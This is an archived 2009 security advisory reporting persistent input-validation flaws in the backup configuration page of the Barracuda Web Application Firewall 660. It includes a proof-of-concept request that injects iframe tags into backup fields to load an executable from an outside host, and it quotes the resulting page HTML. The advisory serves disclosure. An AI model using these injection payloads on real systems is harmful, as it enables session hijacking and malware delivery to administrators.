exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Barracuda Web Firewall 660 Firmware 7.3.1.007 Input Validation

Barracuda Web Firewall 660 Firmware 7.3.1.007 Input Validation
Posted Dec 21, 2009
Authored by Global-Evolution

The Bararcuda web firewall 660 with firmware 7.3.1.007 suffers from input validation vulnerabilities that allow for session hijacking and more.

tags | exploit, web, vulnerability
SHA-256 | bf65427cf42c5a384779e3d121dfd96b62f502dac235f59d56843334b08a4a7d

Barracuda Web Firewall 660 Firmware 7.3.1.007 Input Validation

Change Mirror Download
Pentest Information:
====================
GESEC Team (~remove) discover a input validation vulnerability on Barracuda - Web Application Firewall 660 (Appliance).
A remote attacker is able to get sensitive customer sessions (hijack)or can implement script routines & malicious codes(server-side|persistent).


Details:
========
Tested on OS: Windows 7
Tested with Software: Mozilla Firefox (SEC|MOD) & Web-Developer Suite

Vulnerable Products: Barracuda - Web Application Firewall 660 (Appliance)
Affected Versions: Firmware v7.3.2.015 (2009-12-04 01:20:36) Model 660
Vulnerability Type: Input Vaildation Vulnerability (server-side|persistent)
Security-Risk: Medium

Basement Category: Application|Hardware

Vendor-URL: http://barracuda.com/
Product-URL: http://www.barracudanetworks.com/ns/products/archiver-overview.php
Demo-URL: http://server/cgi-mod/index.cgi

Vendor-Status: Not Informed
Patch/Fix-Status: No Fix/Patch
Advisory-Status: Published | 19.12.2009

UNPUBLIC Advisory-URL: http://global-evolution.info/01xGE/Archive/12.2009/BC%20Web%20Firewall%20660%20v7.3.1.007%20-%20Input%20Validation%20Vulnerability/19.12.2009_BC%20Web%20Firewall%20660%20v7.3.1.007%20-%20Input%20Validation%20Vulnerability.txt
PUBLIC Advisory-URL: *

GE DB-ID: 818
CVE-ID: ()
OSVDB-ID: ()


Introduction:
=============
The Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites.
The Barracuda Web Application Firewall provides award-winning protection against hackers leveraging protocol or
application vulnerabilities to instigate data theft, denial of service or defacement of your Web site.

* Protection against common attacks
* Outbound data theft protection
* Web site cloaking
* Granular policies
* Secure HTTP traffic
* SSL Offloading
* SSL Acceleration
* Load Balancing

The Barracuda Web Application Firewall protects Web applications and Web services from malicious attacks, and can also increase
the performance and scalability of these applications. The Barracuda Web Application Firewall offers every capability needed to
deliver, secure and manage enterprise Web applications from a single appliance through an intuitive, real-time user interface.

* Single point of protection for inbound and outbound traffic for all Web applications
* Protects Web sites and Web applications against application layer attacks
* Delivers best practices security right out of the box
* Monitors traffic and provides reports about attackers and attack attempts

The Barracuda Web Application Firewall provides award-winning protection from all common attacks on Web applications, including
SQL injections, cross-site scripting attacks, session tampering and buffer overflows. Many applications are vulnerable to such
attacks because application developers do not consistently employ secure coding practices. Barracuda Web Application Firewall is
designed to combat all attack types that have been categorized as significant threats, including:

* Cross Site Scripting (XSS)
* SQL injection flaws
* OS command injections
* Site reconnaissance
* Session hijacking
* Application denial of service
* Malicious probes/crawlers
* Cookie/session tampering
* Path traversal
* Information leakage


(Copy from the vendors homepage: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php)



More Details:
=============
A IVE vulnerability is detected on Barracuda - Web Application Firewall 660 with Firmware v7.3.2.015 (2009-12-04 03:23:23am)
Attackers can use the vulnerability script code executions & specific manipulations. When exploited by an authenticated user,
the identified vulnerabilities can lead to Information Disclosure, Session Hijack, access to Intranet available servers.


Server: archiver.barracuda.com
File: index.cgi
Para: ?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username= ... &&backup_password=


Screen: http://img10.imageshack.us/img10/4506/ive1.png
http://img10.imageshack.us/img10/1138/ive2.png




Proof of Concept:
=================
The vulnerabilities can be exploited by potencial attackers. On our Pentests we verified the vulnerability by loading a
"bad-example.exe" (http://img10.imageshack.us/img10/4506/ive1.png) file out of the Barracuda - WebFirewall 660 Appliance Application.
Script code executions & specific manipulations are possible over that form to get access on intranet. For demonstration ...

Vulnerable Module: [+] Backup - Automated Configuration Backups


References(URL):
http://wsf.barracuda.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US


Site-Code Review:
<td valign=top><table summary="Config Module" width=100% cellpadding=0 cellspacing=0 class=config_module_inner><tr id="config_module_row_1" class="config_module_tr"><td valign=top width=15>&nbsp;</td><td valign=middle width=690 ><input type="button" class="new_button" value="Close Window" onClick="window.close(); return false;"><br><iframe width='95%' src='/cgi-bin/index.cgi?backup_port=21&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%20width%3D800%20height%3D800%3E&locale=en_US&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%2Fetc%2Fbad-example.exe%3E&password=f232d3b35c04af128aa56e5913fd5292&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%2Fetc%2Fbad-example.exe%3E&user=guest&backup_life=5&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%2Fetc%2Fbad-example.exe%3E&et=1261218005&primary_tab=ADVANCED&backup_type=ftp&auth_type=Local&secondary_tab=test_backup_server&iframe=stream_backup_test&content_only=1' marginHeight='1' marginWidth='1' height='300' frameborder='1' button_text='Stop' id='frame_results' ></iframe><input type=hidden name=content_only value=1 /></td></tr></table></td>


Complete Site-Code Review: http://nopaste.info/a6b47158b4.html



Fix & Patch:
============
Restrict the Input fields & format the the output when try to show the connection status.
Set clear + working exceptions in the filter or let session expire after illegal character errors.
Involve in the fixes the re-included stuff like the auto backup script on ftp ...



Security Risk:
==============
An attacker is able to include malicious script routines on server-side of the Barracuda - WebFirewall 660.
When exploited by an authenticated user, the identified vulnerabilities can lead to Information Disclosure, Session Hijack,
access to Intranet available servers.The security risk is estimated as medium because of server-side.


Author:
=======
The author & writer is part of "Global-Evolution" Security(GESEC).
GESEC Vulnerability-Research Team protects software, services, applications & informs the vendors on a secured base.
________.__ ___. .__ ___________ .__ __ .__
/ _____/| | ____\_ |__ _____ | | \_ _____/__ ______ | | __ ___/ |_|__| ____ ____
/ \ ___| | / _ \| __ \\__ \ | | ______ | __)_\ \/ / _ \| | | | \ __\ |/ _ \ / \ (c)
\ \_\ \ |_( <_> ) \_\ \/ __ \| |__ /_____/ | \\ ( <_> ) |_| | /| | | ( <_> ) | \
\______ /____/\____/|___ (____ /____/ /_______ / \_/ \____/|____/____/ |__| |__|\____/|___| /
\/ \/ \/ \/ \/


Login or Register to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    13 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    31 Files
  • 8
    Mar 8th
    16 Files
  • 9
    Mar 9th
    13 Files
  • 10
    Mar 10th
    9 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    10 Files
  • 14
    Mar 14th
    6 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    22 Files
  • 17
    Mar 17th
    13 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    16 Files
  • 21
    Mar 21st
    13 Files
  • 22
    Mar 22nd
    5 Files
  • 23
    Mar 23rd
    6 Files
  • 24
    Mar 24th
    47 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    50 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close